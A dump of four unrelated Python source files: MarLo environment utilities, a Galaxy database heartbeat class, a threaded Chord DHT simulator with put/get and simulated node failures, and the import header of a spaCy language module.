utils.py
|
#!/usr/bin/env python
import gym
import marlo
import sys
import os
import importlib
import logging
logger = logging.getLogger(__name__)
from threading import Thread
from queue import Queue
import socket
from contextlib import closing
from marlo.launch_minecraft_in_background import launch_minecraft_in_background
def register_environments(MARLO_ENV_PATHS):
"""Searches for Marlo Environments in the provided paths, and registers
them as valid MarLo environments to be used by `marlo.make`.
Expect that each env directory will have the relevant
gym registrations implemented in ``__init__.py``
and a ``main.py`` will implement a derived class of
:class:`marlo.base_env_builder.MarloEnvBuilderBase` with the necessary
functions overriden.
:param MARLO_ENV_PATHS: Path to directory containing multiple MarLo envs
:type number_of_clients: str
:rtype: None
"""
for env_path in MARLO_ENV_PATHS:
sys.path.append(env_path)
for _marlo_env_dir in os.listdir(env_path):
"""
Expects that each env directory has the relevant
gym registrations implemented in __init__.py
and that a `main.py` implements a derived class of
:class:`marlo.base_env_builder.MarloEnvBuilderBase`.
"""
if os.path.isdir(os.path.join(env_path, _marlo_env_dir)) and \
not str(_marlo_env_dir).startswith("__"):
module = importlib.import_module(_marlo_env_dir)
module._register()
logger.debug("Creating envs from : {}".format(_marlo_env_dir))
def threaded(fn):
"""Implements the ``@marlo.threaded`` decorator to help easily run functions in a
separate thread. Useful in multiagent scenarios when we want to run
multiple blocking agents across different threads.
.. code-block:: python
import time
import marlo
@marlo.threaded
def example_function(agent_id):
print("Agent-id : {}; sleeping for two seconds".format(agent_id))
time.sleep(2)
print("Exiting : {} ".format(agent_id))
thread_handler_1, _ = example_function(1)
thread_handler_2, _ = example_function(2)
thread_handler_1.join()
thread_handler_2.join()
print("Code Exit")
:param fn: Function definition
:type fn: func
:returns: A wrapped function which, when called, runs ``fn`` in a new thread and returns a ``(thread_handler, queue)`` tuple; ``thread_handler`` can be used to join the thread if required, and ``queue`` receives the return value of ``fn``.
"""
def wrap(queue, *args, **kwargs):
queue.put(fn(*args, **kwargs))
def call(*args, **kwargs):
queue = Queue()
job = Thread(target=wrap, args=(queue,) + args, kwargs=kwargs)
job.start()
return job, queue
return call
def find_free_port():
"""Find a random free port where a Minecraft Client can possibly be launched.
:rtype: `int`
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
return s.getsockname()[1]
def launch_clients(number_of_clients, replaceable=False):
"""Launches a series of Minecraft Client which can be used by
MarLo environments.
:param number_of_clients: Number of Minecraft Clients to launch
:type number_of_clients: int
:param replaceable: `replaceable` argument from `launchClient.sh` (TODO: Check with @Andre)
:type replaceable: bool
**Note**: This is still in an experimental phase, as it does not yet clean up
the processes after the code exits.
:returns: A valid `client_pool` object (a `list` of `tuples`)
>>> import marlo
>>> client_pool = marlo.launch_clients(number_of_clients=2)
>>> print(client_pool)
[('127.0.0.1', 27655), ('127.0.0.1', 15438)]
"""
ports = [find_free_port() for _ in range(number_of_clients)]
MINECRAFT_ROOT = os.getenv("MALMO_MINECRAFT_ROOT")
if not MINECRAFT_ROOT:
raise Exception("Please set the environment variable"
"`MALMO_MINECRAFT_ROOT` as the root of your "
"Minecraft Directory")
launch_processes = launch_minecraft_in_background(
MINECRAFT_ROOT,
ports,
replaceable=replaceable
)
client_pool = [('127.0.0.1', port) for port in ports]
return client_pool
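# A sketch of how the returned ``client_pool`` is typically consumed, following the
# MarLo quickstart pattern (the env id below is illustrative):
#
#   >>> client_pool = marlo.launch_clients(number_of_clients=2)
#   >>> join_tokens = marlo.make('MarLo-FindTheGoal-v0',
#   ...                          params={"client_pool": client_pool})
#   >>> env = marlo.init(join_tokens[0])
#
# ``launch_clients`` only reserves free ports and starts the clients; pairing agents
# with clients is handled by ``marlo.make``/``marlo.init``.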
|
database_heartbeat.py
|
import datetime
import logging
import os
import socket
import threading
from galaxy.model import WorkerProcess
from galaxy.model.orm.now import now
log = logging.getLogger(__name__)
class DatabaseHeartbeat:
def __init__(self, application_stack, heartbeat_interval=60):
self.application_stack = application_stack
self.heartbeat_interval = heartbeat_interval
self.hostname = socket.gethostname()
self._is_config_watcher = False
self._observers = []
self.exit = threading.Event()
self.thread = None
self.active = False
self.pid = None
@property
def sa_session(self):
return self.application_stack.app.model.session
@property
def server_name(self):
# Application stack manipulates server name after forking
return self.application_stack.app.config.server_name
def start(self):
if not self.active:
self.thread = threading.Thread(target=self.send_database_heartbeat, name=f"database_heartbeat_{self.server_name}.thread")
self.thread.daemon = True
self.active = True
self.thread.start()
self.pid = os.getpid()
def shutdown(self):
self.active = False
self.exit.set()
if self.thread:
self.thread.join()
worker_process = self.worker_process
if worker_process:
self.sa_session.delete(worker_process)
self.sa_session.flush()
self.application_stack.app.queue_worker.send_control_task('reconfigure_watcher', noop_self=True)
def get_active_processes(self, last_seen_seconds=None):
"""Return all processes seen in ``last_seen_seconds`` seconds."""
if last_seen_seconds is None:
last_seen_seconds = self.heartbeat_interval
seconds_ago = now() - datetime.timedelta(seconds=last_seen_seconds)
return self.sa_session.query(WorkerProcess).filter(WorkerProcess.update_time > seconds_ago).all()
def add_change_callback(self, callback):
self._observers.append(callback)
@property
def is_config_watcher(self):
return self._is_config_watcher
@is_config_watcher.setter
def is_config_watcher(self, value):
self._is_config_watcher = value
log.debug('%s %s config watcher', self.server_name, 'is' if self.is_config_watcher else 'is not')
for callback in self._observers:
callback(self._is_config_watcher)
@property
def worker_process(self):
return self.sa_session.query(WorkerProcess).with_for_update(of=WorkerProcess).filter_by(
server_name=self.server_name,
hostname=self.hostname,
).first()
def update_watcher_designation(self):
worker_process = self.worker_process
if not worker_process:
worker_process = WorkerProcess(server_name=self.server_name, hostname=self.hostname)
worker_process.update_time = now()
worker_process.pid = self.pid
self.sa_session.add(worker_process)
self.sa_session.flush()
# We only want a single process watching the various config files on the file system.
# We just pick the max server name for simplicity
is_config_watcher = self.server_name == max(
p.server_name for p in self.get_active_processes(self.heartbeat_interval + 1))
if is_config_watcher != self.is_config_watcher:
self.is_config_watcher = is_config_watcher
def send_database_heartbeat(self):
if self.active:
while not self.exit.is_set():
self.update_watcher_designation()
self.exit.wait(self.heartbeat_interval)
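# A minimal wiring sketch (``_FakeStack`` and ``app`` are stand-ins for illustration;
# in Galaxy the application stack object comes from the application startup code):
#
#   class _FakeStack:
#       def __init__(self, app):
#           self.app = app
#
#   heartbeat = DatabaseHeartbeat(_FakeStack(app), heartbeat_interval=30)
#   heartbeat.add_change_callback(lambda is_watcher: log.info("watcher=%s", is_watcher))
#   heartbeat.start()     # background thread upserts this process's WorkerProcess row every 30s
#   ...
#   heartbeat.shutdown()  # deletes the WorkerProcess row and asks workers to reconfigure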
|
chord_sim.py
|
# coding:utf-8
import threading
from threading import Thread
import time
import random
from typing import List, Optional, Union, cast
import modules.gval as gval
from modules.node_info import NodeInfo
from modules.chord_util import ChordUtil, KeyValue, DataIdAndValue, ErrorCode, PResult, NodeIsDownedExceptiopn, InternalControlFlowException
from modules.chord_node import ChordNode
from modules.stabilizer import Stabilizer
# Randomly pick one node from the nodes that exist in the network.
# Nodes that are down (their is_alive field is False) are never returned.
def get_a_random_node() -> ChordNode:
with gval.lock_of_all_node_dict:
alive_nodes_list : List[ChordNode] = list(
filter(lambda node: node.is_alive == True and node.is_join_op_finished == True, list(gval.all_node_dict.values()))
)
return ChordUtil.get_random_elem(alive_nodes_list)
# Used to verify the network once a round of stabilize_successor calls has finished.
# Starting from a randomly chosen node, walk the chain of successors in the successor
# direction and print each node's information.
# The chain of predecessors is also walked and printed in the predecessor direction.
def check_nodes_connectivity():
ChordUtil.dprint("check_nodes_connectivity_1")
print("flush", flush=True)
counter : int = 0
# First, walk in the successor direction
cur_node_info : NodeInfo = get_a_random_node().node_info
start_node_info : NodeInfo = cur_node_info
# Total number of nodes (computed excluding those whose is_alive field is False)
with gval.lock_of_all_node_dict:
all_node_num = len(list(filter(lambda node: node.is_alive == True ,list(gval.all_node_dict.values()))))
ChordUtil.print_no_lf("check_nodes_connectivity__succ,all_node_num=" + str(all_node_num) + ",already_born_node_num=" + str(gval.already_born_node_num))
print(",", flush=True, end="")
while counter < all_node_num:
ChordUtil.print_no_lf(str(cur_node_info.born_id) + "," + ChordUtil.conv_id_to_ratio_str(cur_node_info.node_id) + " -> ")
# Each node holds information about its successor but not about its successor's
# successor, so we cannot simply follow a cached successor chain; instead we fetch
# the latest information from each node as we go.
# try:
#cur_node_info = ChordUtil.get_node_by_address(cur_node_info.address_str).node_info.successor_info_list[0]
ret = ChordUtil.get_node_by_address(cur_node_info.address_str)
if (ret.is_ok):
cur_node_info : 'NodeInfo' = cast('ChordNode', ret.result).node_info.successor_info_list[0]
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
if cast(int, ret.err_code) == ErrorCode.NodeIsDownedException_CODE:
print("")
ChordUtil.dprint("check_nodes_connectivity__succ,NODE_IS_DOWNED")
return
else: #cast(int, ret.err_code) == ErrorCode.InternalControlFlowException_CODE
# When get_node_by_address is attempted on the node object of a node that is still
# joining, a TargetNodeDoesNotExistException is raised; in that case give up on
# stabilize_successor for the target node.
print("")
ChordUtil.dprint("check_nodes_connectivity__succ,TARGET_NODE_DOES_NOT_EXIST_EXCEPTION_IS_RAISED")
return
# except NodeIsDownedExceptiopn:
# print("")
# ChordUtil.dprint("check_nodes_connectivity__succ,NODE_IS_DOWNED")
# return
# except InternalControlFlowException:
# # When get_node_by_address is attempted on the node object of a node that is still
# # joining, a TargetNodeDoesNotExistException is raised; in that case give up on
# # stabilize_successor for the target node.
# print("")
# ChordUtil.dprint("check_nodes_connectivity__succ,TARGET_NODE_DOES_NOT_EXIST_EXCEPTION_IS_RAISED")
# return
if cur_node_info == None:
print("", flush=True, end="")
raise Exception("no successor having node was detected!")
counter += 1
print("")
# Only check once the second node has joined.
# Following the successors should bring us back to the starting node; if it does not,
# the successor chain is not constructed correctly, so report this as an error.
if all_node_num >=2 and cur_node_info.node_id != start_node_info.node_id:
ChordUtil.dprint("check_nodes_connectivity_succ_err,chain does not includes all node. all_node_num = "
+ str(all_node_num) + ","
+ ChordUtil.gen_debug_str_of_node(start_node_info) + ","
+ ChordUtil.gen_debug_str_of_node(cur_node_info))
# raise exception("SUCCESSOR_CHAIN_IS_NOT_CONSTRUCTED_COLLECTLY")
else:
ChordUtil.dprint("check_nodes_connectivity_succ_success,chain includes all node. all_node_num = "
+ str(all_node_num) + ","
+ ChordUtil.gen_debug_str_of_node(start_node_info) + ","
+ ChordUtil.gen_debug_str_of_node(cur_node_info))
# Next, walk in the predecessor direction
counter = 0
cur_node_info = get_a_random_node().node_info
start_node_info = cur_node_info
ChordUtil.print_no_lf("check_nodes_connectivity__pred,all_node_num=" + str(all_node_num) + ",already_born_node_num=" + str(gval.already_born_node_num))
print(",", flush=True, end="")
while counter < all_node_num:
ChordUtil.print_no_lf(str(cur_node_info.born_id) + "," + ChordUtil.conv_id_to_ratio_str(cur_node_info.node_id) + " -> ")
# try:
#cur_node_info = ChordUtil.get_node_by_address(cur_node_info.address_str).node_info.predecessor_info
ret = ChordUtil.get_node_by_address(cur_node_info.address_str)
if (ret.is_ok):
cur_node_info: 'NodeInfo' = cast('ChordNode', ret.result).node_info.predecessor_info
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
if cast(int, ret.err_code) == ErrorCode.NodeIsDownedException_CODE:
print("")
ChordUtil.dprint("check_nodes_connectivity__pred,NODE_IS_DOWNED")
return
else: #cast(int, ret.err_code) == ErrorCode.InternalControlFlowException_CODE
# When get_node_by_address is attempted on the node object of a node that is still
# joining, a TargetNodeDoesNotExistException is raised; in that case give up on
# stabilize_successor for the target node.
print("")
ChordUtil.dprint("check_nodes_connectivity__pred,TARGET_NODE_DOES_NOT_EXIST_EXCEPTION_IS_RAISED")
return
# except NodeIsDownedExceptiopn:
# print("")
# ChordUtil.dprint("check_nodes_connectivity__pred,NODE_IS_DOWNED")
# return
# except InternalControlFlowException:
# # When get_node_by_address is attempted on the node object of a node that is still
# # joining, a TargetNodeDoesNotExistException is raised; in that case give up on
# # stabilize_successor for the target node.
# print("")
# ChordUtil.dprint("check_nodes_connectivity__pred,TARGET_NODE_DOES_NOT_EXIST_EXCEPTION_IS_RAISED")
# return
if cur_node_info == None:
# We cannot follow the chain any further, so end the check here
ChordUtil.dprint("check_nodes_connectivity__pred,PREDECESSOR_INFO_IS_NONE")
return
counter += 1
print("")
# In principle this check could run from the second node onward, but because of the
# timing of stabilize processing the predecessor may stay None for a while after the
# second node joins, and this check may run in that window; to allow some margin we
# only check from the fifth node onward.
# Following the predecessors should bring us back to the starting node; if it does
# not, the predecessor chain is not constructed correctly, so report this as an error.
if all_node_num >=5 and cur_node_info.node_id != start_node_info.node_id:
ChordUtil.dprint("check_nodes_connectivity_pred_err,chain does not includes all node. all_node_num = "
+ str(all_node_num) + ","
+ ChordUtil.gen_debug_str_of_node(start_node_info) + ","
+ ChordUtil.gen_debug_str_of_node(cur_node_info))
# raise Exception("PREDECESSOR_CHAIN_IS_NOT_CONSTRUCTED_COLLECTLY")
else:
ChordUtil.dprint("check_nodes_connectivity_pred_success,chain includes all node. all_node_num = "
+ str(all_node_num) + ","
+ ChordUtil.gen_debug_str_of_node(start_node_info) + ","
+ ChordUtil.gen_debug_str_of_node(cur_node_info))
# TODO: When turning this into a real system, retry handling needs to be reworked so
#       that it happens inside the REST interface call corresponding to each operation.
# Pick an introducer node at random and have the new node join the network through it.
def add_new_node():
# # Acquire the lock
# gval.lock_of_all_data.acquire()
if Stabilizer.need_join_retry_node != None:
# If the previous call failed, retry it
tyukai_node = cast('ChordNode', Stabilizer.need_join_retry_tyukai_node)
new_node = cast('ChordNode', Stabilizer.need_join_retry_node)
new_node.stabilizer.join(tyukai_node.node_info.address_str)
if Stabilizer.need_join_retry_node == None:
# The retry information has not been set again, so the retry is judged to have succeeded
ChordUtil.dprint(
"add_new_node_1,retry of join is succeeded," + ChordUtil.gen_debug_str_of_node(new_node.node_info))
else:
ChordUtil.dprint(
"add_new_node_2,retry of join is failed," + ChordUtil.gen_debug_str_of_node(new_node.node_info))
else:
tyukai_node = get_a_random_node()
new_node = ChordNode(tyukai_node.node_info.address_str)
if Stabilizer.need_join_retry_node == None:
# If the join processing (performed inside the ChordNode constructor, except on retries) succeeded
gval.all_node_dict[new_node.node_info.address_str] = new_node
# Perform here the parts of the join processing that do not have to be finished at
# the moment the node joins the network without harming data consistency or network
# stability (these tasks sit in the node's task queue, so we simply execute them).
new_node.tqueue.exec_first()
# # Release the lock
# gval.lock_of_all_data.release()
def do_stabilize_successor_th(node_list : List[ChordNode]):
for times in range(0, gval.STABILIZE_SUCCESSOR_BATCH_TIMES):
for node in node_list:
# try:
#node.stabilizer.stabilize_successor()
ret = node.stabilizer.stabilize_successor()
if (ret.is_ok):
pass
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE
# When get_node_by_address is attempted on the node object of a node that is still
# joining, an InternalControlFlowException is raised; in that case give up on
# stabilizing the target node.
ChordUtil.dprint(
"do_stabilize_successor_th," + ChordUtil.gen_debug_str_of_node(node.node_info)
+ ",STABILIZE_FAILED_DUE_TO_INTERNAL_CONTROL_FLOW_EXCEPTION_RAISED")
# except (InternalControlFlowException, NodeIsDownedExceptiopn):
# # When get_node_by_address is attempted on the node object of a node that is still
# # joining, an InternalControlFlowException is raised; in that case give up on
# # stabilizing the target node.
# ChordUtil.dprint(
# "do_stabilize_successor_th," + ChordUtil.gen_debug_str_of_node(node.node_info)
# + ",STABILIZE_FAILED_DUE_TO_INTERNAL_CONTROL_FLOW_EXCEPTION_RAISED")
def do_stabilize_ftable_th(node_list : List[ChordNode]):
for times in range(0, gval.STABILIZE_FTABLE_BATCH_TIMES):
for table_idx in range(0, gval.ID_SPACE_BITS):
for node in node_list:
# try:
#node.stabilizer.stabilize_finger_table(table_idx)
ret = node.stabilizer.stabilize_finger_table(table_idx)
if (ret.is_ok):
pass
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE
# When get_node_by_address is attempted on the node object of a node that is still
# joining, an InternalControlFlowException is raised; in that case give up on
# stabilizing the target node.
ChordUtil.dprint(
"do_stabilize_ftable_th," + ChordUtil.gen_debug_str_of_node(node.node_info)
+ ",STABILIZE_FAILED_DUE_TO_INTERNAL_CONTROL_FLOW_EXCEPTION_RAISED")
# except (InternalControlFlowException, NodeIsDownedExceptiopn):
# # When get_node_by_address is attempted on the node object of a node that is still
# # joining, an InternalControlFlowException is raised; in that case give up on
# # stabilizing the target node.
# ChordUtil.dprint(
# "do_stabilize_ftable_th," + ChordUtil.gen_debug_str_of_node(node.node_info)
# + ",STABILIZE_FAILED_DUE_TO_INTERNAL_CONTROL_FLOW_EXCEPTION_RAISED")
def do_stabilize_onace_at_all_node_successor(node_list : List[ChordNode]) -> List[Thread]:
list_len = len(node_list)
range_start = 0
# Truncate the fractional part (floor division)
basic_pass_node_cnt = int(list_len / gval.STABILIZE_THREAD_NUM)
thread_list : List[Thread] = []
for thread_idx in range(0, gval.STABILIZE_THREAD_NUM):
if thread_idx == gval.STABILIZE_THREAD_NUM - 1:
thread = threading.Thread(target=do_stabilize_successor_th, name="successor-" + str(thread_idx),
args=([node_list[range_start:]]))
else:
thread = threading.Thread(target=do_stabilize_successor_th, name="successor-" + str(thread_idx),
args=([node_list[range_start:range_start + basic_pass_node_cnt]]))
range_start += basic_pass_node_cnt
thread.start()
thread_list.append(thread)
return thread_list
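# Worked example of the partitioning above (illustrative numbers): with
# STABILIZE_THREAD_NUM = 4 and 10 nodes, basic_pass_node_cnt = int(10 / 4) = 2, so the
# threads receive the slices [0:2], [2:4], [4:6] and [6:]; the remainder of the
# integer division is absorbed by the last thread.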
def do_stabilize_onace_at_all_node_ftable(node_list : List[ChordNode]) -> List[Thread]:
list_len = len(node_list)
range_start = 0
# Truncate the fractional part (floor division)
basic_pass_node_cnt = int(list_len / gval.STABILIZE_THREAD_NUM)
thread_list : List[Thread] = []
for thread_idx in range(0, gval.STABILIZE_THREAD_NUM):
if thread_idx == gval.STABILIZE_THREAD_NUM - 1:
thread = threading.Thread(target=do_stabilize_ftable_th, name="ftable-" + str(thread_idx),
args=([node_list[range_start:]]))
else:
thread = threading.Thread(target=do_stabilize_successor_th, name="ftable-" + str(thread_idx),
args=([node_list[range_start:range_start + basic_pass_node_cnt]]))
range_start += basic_pass_node_cnt
thread.start()
thread_list.append(thread)
return thread_list
# Have nodes chosen without duplication from the values of the all_node_dict dictionary perform the stabilize action
def do_stabilize_once_at_all_node():
ChordUtil.dprint("do_stabilize_once_at_all_node_0,START")
with gval.lock_of_all_node_dict:
node_list = list(gval.all_node_dict.values())
shuffled_node_list : List[ChordNode] = random.sample(node_list, len(node_list))
thread_list_succ : List[Thread] = do_stabilize_onace_at_all_node_successor(shuffled_node_list)
thread_list_ftable : List[Thread] = do_stabilize_onace_at_all_node_ftable(shuffled_node_list)
# Wait until all threads have finished.
# Each join call blocks, but even if other threads finish in the meantime we can
# still confirm afterwards that their work is done, so this is not a problem.
for thread in thread_list_succ:
thread.join()
for thread in thread_list_ftable:
thread.join()
check_nodes_connectivity()
# Generate some data, compute its ID, resolve the address of the node on the Chord
# network responsible for that ID, and ask the node that was found to perform a put.
def do_put_on_random_node():
# # Acquire the lock
# gval.lock_of_all_data.acquire()
is_retry = False
if ChordNode.need_put_retry_data_id != -1:
# global_put failed during the previous call, so a retry is needed
is_retry = True
# The key and the value share the same content, so the recorded value is also used as the key
kv_data = KeyValue(ChordNode.need_put_retry_data_value, ChordNode.need_put_retry_data_value)
# data_id is derived from a random number (a cheat), so overwrite it with the recorded one
kv_data.data_id = ChordNode.need_put_retry_data_id
node = cast('ChordNode', ChordNode.need_put_retry_node)
else:
# Use the UNIX time obtained with millisecond precision, converted to a string, as the key
unixtime_str = str(time.time())
# The value is a generated random number rendered in hexadecimal
random_num = random.randint(0, gval.ID_SPACE_RANGE - 1)
kv_data = KeyValue(unixtime_str, hex(random_num))
# To check consistency at get time when data has been updated, every second put
# reuses the ID of data that has already been put as the key.
if gval.already_issued_put_cnt % 2 != 0:
random_kv_elem : 'KeyValue' = ChordUtil.get_random_data()
data_id = random_kv_elem.data_id
kv_data.data_id = data_id
node = get_a_random_node()
# True is returned on success, and only in that case is the entry appended to all_data_list
if node.endpoints.rrpc__global_put(cast(int, kv_data.data_id), kv_data.value_data):
with gval.lock_of_all_data_list:
gval.all_data_list.append(kv_data)
if is_retry:
if ChordNode.need_put_retry_data_id == -1:
# The retry information has not been set again, so the retry is judged to have succeeded
ChordUtil.dprint(
"do_put_on_random_node_1,retry of global_put is succeeded," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(cast(int, kv_data.data_id)))
else:
ChordUtil.dprint(
"do_put_on_random_node_2,retry of global_put is failed," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(cast(int, kv_data.data_id)))
# # Release the lock
# gval.lock_of_all_data.release()
# Pick a random entry from the global all_data_list, resolve from its ID the address
# of the responsible node on the Chord network, and ask the node that was found to
# perform a get.
def do_get_on_random_node():
# # Acquire the lock
# gval.lock_of_all_data.acquire()
# If no put has been performed yet, do nothing and return
with gval.lock_of_all_data_list:
if len(gval.all_data_list) == 0:
# gval.lock_of_all_data.release()
return
is_retry = False
if ChordNode.need_getting_retry_data_id != -1:
# doing retry
# Increment the counter because we are retrying
gval.global_get_retry_cnt += 1
# Once the retry count reaches the configured limit, print where the data is located
if gval.global_get_retry_cnt == gval.GLOBAL_GET_RETRY_CNT_LIMIT_TO_DEBEUG_PRINT:
ChordUtil.print_data_placement_info(ChordNode.need_getting_retry_data_id, after_notfound_limit=True)
else:
ChordUtil.print_data_placement_info(ChordNode.need_getting_retry_data_id)
is_retry = True
target_data_id = ChordNode.need_getting_retry_data_id
node = cast('ChordNode', ChordNode.need_getting_retry_node)
else:
# Not a retry (including the case where a retry completed successfully), so reset the counter
gval.global_get_retry_cnt = 0
with gval.lock_of_all_data_list:
target_data = ChordUtil.get_random_elem(gval.all_data_list)
target_data_id = target_data.data_id
# Although it inflates the log volume, print the location of the target data every time a global_get is performed
ChordUtil.print_data_placement_info(target_data_id)
node = get_a_random_node()
got_result : str = node.endpoints.rrpc__global_get(target_data_id)
# Nested helper function
def print_data_consistency():
# TODO: Considering lookup cost, gval.all_data_list might be better as a dict
#       (at do_get_on_random_node)
with gval.lock_of_all_data_list:
for idx in reversed(range(0, len(gval.all_data_list))):
if gval.all_data_list[idx].data_id == target_data_id:
latest_elem = gval.all_data_list[idx]
if got_result == latest_elem.value_data:
ChordUtil.dprint(
"do_get_on_random_node_1," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(target_data_id) + ","
+ got_result
+ ",OK_GOT_VALUE_WAS_LATEST")
else:
ChordUtil.dprint(
"do_get_on_random_node_1," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(target_data_id) + ","
+ got_result
+ ",WARN__GOT_VALUE_WAS_INCONSISTENT")
if is_retry:
if ChordNode.need_getting_retry_data_id == -1:
# The retry information has not been set again, so the retry is judged to have succeeded
print_data_consistency()
ChordUtil.dprint(
"do_get_on_random_node_2,retry of global_get is succeeded," + ChordUtil.gen_debug_str_of_node(
node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(target_data_id))
else:
ChordUtil.dprint(
"do_get_on_random_node_2,retry of global_get is failed," + ChordUtil.gen_debug_str_of_node(
node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(target_data_id))
else:
if ChordNode.need_getting_retry_data_id == -1:
# Run the check only when global_get succeeded
print_data_consistency()
# # Release the lock
# gval.lock_of_all_data.release()
# Pick a random node from the global all_node_dict and bring it down
# (set its is_alive field to False).
def do_kill_a_random_node():
# # Acquire the lock
# gval.lock_of_all_data.acquire()
node = get_a_random_node()
# if node.node_info.lock_of_pred_info.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
# ChordUtil.dprint(
# "do_kill_a_random_node_0_1," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
# + "LOCK_ACQUIRE_TIMEOUT")
# return
# if node.node_info.lock_of_succ_infos.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
# node.node_info.lock_of_pred_info.release()
# ChordUtil.dprint(
# "do_kill_a_random_node_0_2," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
# + "LOCK_ACQUIRE_TIMEOUT")
# return
# if node.node_info.lock_of_datastore.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
# node.node_info.lock_of_pred_info.release()
# node.node_info.lock_of_succ_infos.release()
# ChordUtil.dprint(
# "do_kill_a_random_node_0_3," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
# + "LOCK_ACQUIRE_TIMEOUT")
# return
try:
with gval.lock_of_all_node_dict:
if len(gval.all_node_dict) > 10 \
and (ChordNode.need_getting_retry_data_id == -1
and ChordNode.need_put_retry_data_id == -1
and Stabilizer.need_join_retry_node == None):
node.is_alive = False
ChordUtil.dprint(
"do_kill_a_random_node_1,"
+ ChordUtil.gen_debug_str_of_node(node.node_info))
with node.node_info.lock_of_datastore:
for key, value in node.data_store.stored_data.items():
data_id: str = key
sv_entry : DataIdAndValue = value
ChordUtil.dprint("do_kill_a_random_node_2,"
+ ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ hex(int(data_id)) + "," + hex(sv_entry.data_id))
finally:
# node.node_info.lock_of_datastore.release()
# node.node_info.lock_of_succ_infos.release()
# node.node_info.lock_of_pred_info.release()
pass
# # Release the lock
# gval.lock_of_all_data.release()
# TODO: A script or similar that performs the corresponding processing is needed (node_join_th)
def node_join_th():
while gval.already_born_node_num < gval.NODE_NUM_MAX:
if gval.already_born_node_num == gval.KEEP_NODE_NUM:
time.sleep(60.0)
gval.is_network_constructed = True
gval.JOIN_INTERVAL_SEC = 120.0 #20.0
# # TODO: For debugging, stop joins once 1000 nodes have been reached. Revert this later!
# # at node_join_th
# break
add_new_node()
time.sleep(gval.JOIN_INTERVAL_SEC)
def stabilize_th():
while True:
# Run stabilize over the node list as it exists at call time, while releasing locks
# internally as appropriate so that other threads can also make progress.
do_stabilize_once_at_all_node()
# TODO: A test program that hits the endpoints over REST is needed (data_put_th)
def data_put_th():
while gval.is_network_constructed == False:
time.sleep(1)
while True:
do_put_on_random_node()
time.sleep(gval.PUT_INTERVAL_SEC)
# TODO: A test program that hits the endpoints over REST is needed (data_get_th)
def data_get_th():
while gval.is_network_constructed == False:
time.sleep(1)
while True:
# The call returns immediately if no put has been performed yet, so it is safe to
# start this thread at the same time as the put thread.
do_get_on_random_node()
# This runs endlessly, so sleep between iterations to keep the debug output from
# growing too large.
time.sleep(gval.GET_INTERVAL_SEC)
# TODO: A script or similar that kills a randomly chosen process is needed (node_kill_th)
def node_kill_th():
while gval.is_network_constructed == False:
time.sleep(1)
while True:
# # Enable the node-down processing once more than 10 nodes exist in the network.
# # However, suppress it while there is processing that must be retried or while a
# # node that still needs to run partial_join_op exists.
# if len(gval.all_node_dict) > 10 \
# and (ChordNode.need_getting_retry_data_id == -1
# and ChordNode.need_put_retry_data_id == -1
# and Stabilizer.need_join_retry_node == None
# and gval.is_waiting_partial_join_op_exists == False) :
# do_kill_a_random_node()
do_kill_a_random_node()
time.sleep(gval.NODE_KILL_INTERVAL_SEC)
def main():
# result1 : PResult[Optional[NodeInfo]] = ChordUtil.generic_test_ok(NodeInfo())
# print(result1)
# result2 : PResult[Optional[NodeInfo]] = ChordUtil.generic_test_err(ErrorCode.NodeIsDownedException_CODE)
# print(result2)
#
# ret = ChordUtil.generic_test_ok(NodeInfo())
# if ret.is_ok:
# casted_ret : 'NodeInfo' = cast('NodeInfo', ret.result)
# print("Ok")
# else:
# casted_ret: int = cast(int, ret.err_code)
# print(casted_ret)
#
# ret = ChordUtil.generic_test_err(ErrorCode.NodeIsDownedException_CODE)
# if ret.is_ok:
# casted_ret : 'NodeInfo' = print(cast('NodeInfo', ret.result))
# print("Ok")
# else:
# casted_ret : int = cast(int, ret.err_code)
# print(casted_ret)
# Fix the random seed for reproducibility.
# However, since multiple threads exist and the timing of when individual work
# finishes or when threads are switched can differ between runs, this may not help much.
random.seed(1337)
# The first node is registered here
first_node = ChordNode("THIS_VALUE_IS_NOT_USED", first_node=True)
first_node.is_join_op_finished = True
gval.all_node_dict[first_node.node_info.address_str] = first_node
time.sleep(0.5)  # To avoid the next node being created with the same address string
node_join_th_handle = threading.Thread(target=node_join_th, daemon=True)
node_join_th_handle.start()
stabilize_th_handle = threading.Thread(target=stabilize_th, daemon=True)
stabilize_th_handle.start()
data_put_th_handle = threading.Thread(target=data_put_th, daemon=True)
data_put_th_handle.start()
data_get_th_handle = threading.Thread(target=data_get_th, daemon=True)
data_get_th_handle.start()
node_kill_th_handle = threading.Thread(target=node_kill_th, daemon=True)
node_kill_th_handle.start()
while True:
time.sleep(1)
if __name__ == '__main__':
main()
|
language.py
|
# coding: utf8
from __future__ import absolute_import, unicode_literals
import random
import itertools
from spacy.util import minibatch
import weakref
import functools
from collections import OrderedDict
from contextlib import contextmanager
from copy import copy, deepcopy
from thinc.neural import Model
import srsly
import multiprocessing as mp
from itertools import chain, cycle
from .tokenizer import Tokenizer
from .vocab import Vocab
from .lemmatizer import Lemmatizer
from .lookups import Lookups
from .pipeline import DependencyParser, Tagger
from .pipeline import Tensorizer, EntityRecognizer, EntityLinker
from .pipeline import SimilarityHook, TextCategorizer, Sentencizer
from .pipeline import merge_noun_chunks, merge_entities, merge_subtokens
from .pipeline import EntityRuler
from .pipeline import Morphologizer
from .compat import izip, basestring_, is_python2
